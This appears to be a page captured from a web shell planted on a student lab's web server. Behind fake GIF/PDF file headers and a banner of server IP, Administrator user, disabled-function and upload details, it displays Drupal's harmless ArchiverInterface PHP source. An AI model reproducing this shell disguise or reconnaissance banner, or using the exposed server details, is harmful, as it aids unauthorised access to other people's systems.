GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Archiver/ |
Upload File : |
<?php namespace Drupal\Core\Archiver; /** * Defines the common interface for all Archiver classes. * * @see \Drupal\Core\Archiver\ArchiverManager * @see \Drupal\Core\Archiver\Annotation\Archiver * @see plugin_api */ interface ArchiverInterface { /** * Adds the specified file or directory to the archive. * * @param string $file_path * The full system path of the file or directory to add. Only local files * and directories are supported. * * @return \Drupal\Core\Archiver\ArchiverInterface * The called object. */ public function add($file_path); /** * Removes the specified file from the archive. * * @param string $path * The file name relative to the root of the archive to remove. * * @return \Drupal\Core\Archiver\ArchiverInterface * The called object. */ public function remove($path); /** * Extracts multiple files in the archive to the specified path. * * @param string $path * A full system path of the directory to which to extract files. * @param array $files * Optionally specify a list of files to be extracted. Files are * relative to the root of the archive. If not specified, all files * in the archive will be extracted. * * @return \Drupal\Core\Archiver\ArchiverInterface * The called object. */ public function extract($path, array $files = []); /** * Lists all files in the archive. * * @return array * An array of file names relative to the root of the archive. */ public function listContents(); }